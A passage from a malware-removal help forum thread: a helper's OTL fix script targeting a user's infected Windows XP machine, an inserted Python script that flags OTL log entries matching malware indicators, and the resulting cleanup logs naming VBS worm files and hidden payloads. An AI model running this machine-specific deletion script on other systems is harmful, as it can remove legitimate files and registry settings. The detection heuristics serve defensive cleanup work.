    [2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
    [2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
    [2011/12/05 13:26:19 | 000,042,167 | ---- | C] () -- C:\WINDOWS\System32\pkzip.exe
    [2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
    [2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\mkbr.exe
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\lrgv.exe
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\foph.exe
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\bvbt.exe
    [2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270
    [2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270
    [2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452
    [2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\wshs.exe
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\jbpy.exe
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\fnqu.exe
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\ejbt.exe
    [2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k
    [2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k
    [2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Babylon
    [2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Babylon
    @Alternate Data Stream - 816 bytes -> C:\WINDOWS\3628639882:1968813863.exe
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 4521 Bessen 2009.doc:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1188 Co 2003.doc:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Thom.xls:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa.xls:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa (Thom Ringer's conflicted copy 2012-02-08).xls:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Data Abstraction Thom.xls:com.dropbox.attributes
    @Alternate Data Stream - 65 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Tracking SS.xlsx:com.dropbox.attributes
    @Alternate Data Stream - 58 bytes -> C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf:com.dropbox.attributes
    @Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1171 Banait 2002.doc:com.dropbox.attributes
    @Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot:com.dropbox.attributes
    :reg
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
    "EnableFirewall"=dword:00000001
    "DisableNotifications"=dword:00000000
    :commands
    [emptytemp]
    
  • Push the Run Fix button.
  • OTL may ask to reboot the machine. Please do so if asked.
  • Click OK.
  • A report will open. Copy and Paste that report in your next reply.
  • If a report is not shown please navigate to the C:\_OTL\MovedFiles folder, and open the newest .log file present.
  • Copy/paste the content of the log back here in your next post.



Regards,
Georgi

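Added example, not code from the thread or from OTL itself: a small Python triage script that parses the two OTL listing-line formats quoted in the fix above ("[timestamp | size | attrs | C/M] (company) -- path" and "@Alternate Data Stream - N bytes -> path:stream") and flags the same kinds of entries the helper picked out: script hosts under System32, hidden+system blobs with random names under Application Data, zero-byte executables, groups of files sharing one byte size, and an .exe stream attached to a bare numeric directory under C:\WINDOWS. The sample lines are copied from the post; the rule names and thresholds are assumptions made for this example.

```python
import re
from collections import Counter

# Constructed input: lines copied from the OTL fix script quoted in the post above.
SAMPLE_LINES = r"""
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Israfel.vbs
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\hta.vbs
[2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\GEDZAC.vbs
[2012/03/01 10:42:56 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Kernel32.win
[2012/05/11 11:22:21 | 000,012,549 | ---- | M] () -- C:\WINDOWS\System32\AvrilLavigne.jpg
[2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\mkbr.exe
[2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Babylon
@Alternate Data Stream - 816 bytes -> C:\WINDOWS\3628639882:1968813863.exe
@Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Thom.xls:com.dropbox.attributes
""".strip().splitlines()

# OTL file listing: [timestamp | size | attrs | C/M] (company) -- path
FILE_RE = re.compile(
    r"^\[(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \| (?P<size>[\d,]+) \| "
    r"(?P<attrs>[-A-Z]{4}) \| (?P<flag>[CM])\] (?:\((?P<company>[^)]*)\) )?-- (?P<path>.+)$"
)
# OTL alternate data stream listing: @Alternate Data Stream - N bytes -> path:stream
ADS_RE = re.compile(r"^@Alternate Data Stream - (?P<size>\d+) bytes -> (?P<path>.+)$")

SCRIPT_EXT = (".vbs", ".hta", ".js")  # script hosts that have no business in System32


def parse_otl_line(line):
    """Parse one OTL listing line into a dict; return None for lines of other kinds."""
    line = line.strip()
    m = FILE_RE.match(line)
    if m:
        d = m.groupdict()
        d["kind"] = "file"
        d["size"] = int(d["size"].replace(",", ""))
        d["is_dir"] = "D" in d["attrs"]
        return d
    m = ADS_RE.match(line)
    if m:
        return {"kind": "ads", "size": int(m.group("size")), "path": m.group("path")}
    return None


def triage(lines, clone_threshold=3):
    """Return (rule, path) findings for the indicator patterns the fix above targets.

    The thresholds (3 same-size files, 15-character random names) are assumptions
    chosen for this example, not settings of OTL or of the helper."""
    entries = [e for e in map(parse_otl_line, lines) if e]
    size_counts = Counter(e["size"] for e in entries
                          if e["kind"] == "file" and not e["is_dir"] and e["size"] > 0)
    findings = []
    for e in entries:
        path, low = e["path"], e["path"].lower()
        if e["kind"] == "ads":
            # An .exe stream on a bare numeric directory under C:\WINDOWS is the entry
            # the helper pre-empted with DummyCreator; Dropbox tags on documents are benign.
            host, _, stream = path.rpartition(":")
            if re.search(r"\\windows\\\d+$", host, re.I) and stream.lower().endswith(".exe"):
                findings.append(("exe-stream-on-numeric-dir", path))
            continue
        if e["is_dir"]:
            continue
        name = low.rsplit("\\", 1)[-1]
        if "\\system32\\" in low and name.endswith(SCRIPT_EXT):
            findings.append(("script-in-system32", path))
        if ("H" in e["attrs"] and "S" in e["attrs"] and "." not in name
                and len(name) >= 15 and "application data" in low):
            findings.append(("hidden-system-blob", path))
        if e["size"] == 0 and name.endswith(".exe"):
            findings.append(("zero-byte-exe", path))
        if e["size"] > 0 and size_counts[e["size"]] >= clone_threshold:
            findings.append(("same-size-clone", path))  # one payload copied under many names
    return findings


if __name__ == "__main__":
    for rule, path in triage(SAMPLE_LINES):
        print(f"{rule:28} {path}")
```

Running it against a full OTL listing rather than the ten sample lines surfaces the same clusters the helper built the fix from, while untouched entries such as the Dropbox attribute streams stay out of the findings.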


#14 worries

  • Topic Starter
  • Members
  • 47 posts
  • Local time:09:41 AM

Posted 14 May 2012 - 05:12 PM

Here is Result.txt

DummyCreator by Farbar
Ran by Annie (administrator) on 14-05-2012 at 18:12:01
**************************************************************

C:\WINDOWS\3628639882 [14-05-2012 18:12:01]

== End of log ==

#15 worries

  • Topic Starter
  • Members
  • 47 posts
  • Local time:09:41 AM

Posted 14 May 2012 - 05:51 PM

OTL

All processes killed
========== OTL ==========
No active process named sendi.exe was found!
No active process named regsrv.exe was found!
Service catchme stopped successfully!
Service catchme deleted successfully!
File C:\ComboFix\catchme.sys not found.
Error: No service named aswMBR was found to stop!
Service\Driver key aswMBR not found.
File C:\DOCUME~1\Annie\LOCALS~1\Temp\aswMBR.sys not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB}\ not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\Israfel deleted successfully.
C:\WINDOWS\system32\Israfel.vbs moved successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\Kernel32 deleted successfully.
C:\WINDOWS\system32\Kernel32.win moved successfully.
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\\DisableRegistryTools deleted successfully.
C:\WINDOWS\system32\sendi.exe moved successfully.
C:\WINDOWS\system32\regsrv.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon\Setup\HtmlScreens folder moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon\Setup folder moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon folder moved successfully.
C:\Documents and Settings\Annie\Application Data\Babylon folder moved successfully.
C:\Documents and Settings\All Users\Application Data\Babylon folder moved successfully.
C:\Estigma.hta moved successfully.
File C:\WINDOWS\System32\Israfel.vbs not found.
C:\WINDOWS\system32\hta.vbs moved successfully.
C:\WINDOWS\system32\GEDZAC.vbs moved successfully.
C:\WINDOWS\system32\FILEZIP.ZIP moved successfully.
C:\WINDOWS\system32\File.vbs moved successfully.
C:\WINDOWS\DelShortcut.vbs moved successfully.
C:\WINDOWS\wininit.ini moved successfully.
C:\WINDOWS\system32\ixn.dat moved successfully.
C:\WINDOWS\system32\ix.dat moved successfully.
C:\WINDOWS\system32\Template.htm moved successfully.
C:\WINDOWS\system32\iwn.dat moved successfully.
C:\WINDOWS\system32\iw.dat moved successfully.
C:\WINDOWS\system32\AvrilLavigne.jpg moved successfully.
File C:\WINDOWS\System32\Kernel32.win not found.
C:\user.js moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55 moved successfully.
C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55 moved successfully.
C:\WINDOWS\system32\pkzip.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x moved successfully.
C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x moved successfully.
C:\Documents and Settings\All Users\Application Data\mkbr.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\lrgv.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\foph.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\bvbt.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270 moved successfully.
C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270 moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452 moved successfully.
C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452 moved successfully.
C:\Documents and Settings\All Users\Application Data\wshs.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\jbpy.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\fnqu.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\ejbt.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k moved successfully.
C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k moved successfully.
Folder C:\Documents and Settings\All Users\Application Data\Babylon\ not found.
Folder C:\Documents and Settings\Annie\Application Data\Babylon\ not found.
Unable to delete ADS C:\WINDOWS\3628639882:1968813863.exe .
ADS C:\Documents and Settings\Annie\Desktop\TR CA 4521 Bessen 2009.doc:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\TR CA 1188 Co 2003.doc:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Level2 Thom.xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Level2 Kappa.xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Level2 Kappa (Thom Ringer's conflicted copy 2012-02-08).xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Data Abstraction Thom.xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Critical Appraisal Tracking SS.xlsx:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\TR CA 1171 Banait 2002.doc:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot:com.dropbox.attributes deleted successfully.
========== REGISTRY ==========
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\\"EnableFirewall"|dword:00000001 /E : value set successfully!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\\"DisableNotifications"|dword:00000000 /E : value set successfully!
========== COMMANDS ==========

[EMPTYTEMP]

User: Administrator
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 67 bytes
->FireFox cache emptied: 5643951 bytes
->Flash cache emptied: 321 bytes

User: All Users

User: Annie
->Temp folder emptied: 60148644 bytes
->Temporary Internet Files folder emptied: 63540495 bytes
->Java cache emptied: 15640437 bytes
->FireFox cache emptied: 1167049589 bytes
->Google Chrome cache emptied: 7874552 bytes
->Flash cache emptied: 185644 bytes

User: Default User
->Temp folder emptied: 16392656 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Flash cache emptied: 321 bytes

User: LocalService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 32902 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 67 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 2577 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 178506 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 33438 bytes
RecycleBin emptied: 2326186 bytes

Total Files Cleaned = 1,277.00 mb


OTL by OldTimer - Version 3.2.42.3 log created on 05142012_182242

Files\Folders moved on Reboot...

Registry entries deleted on Reboot...



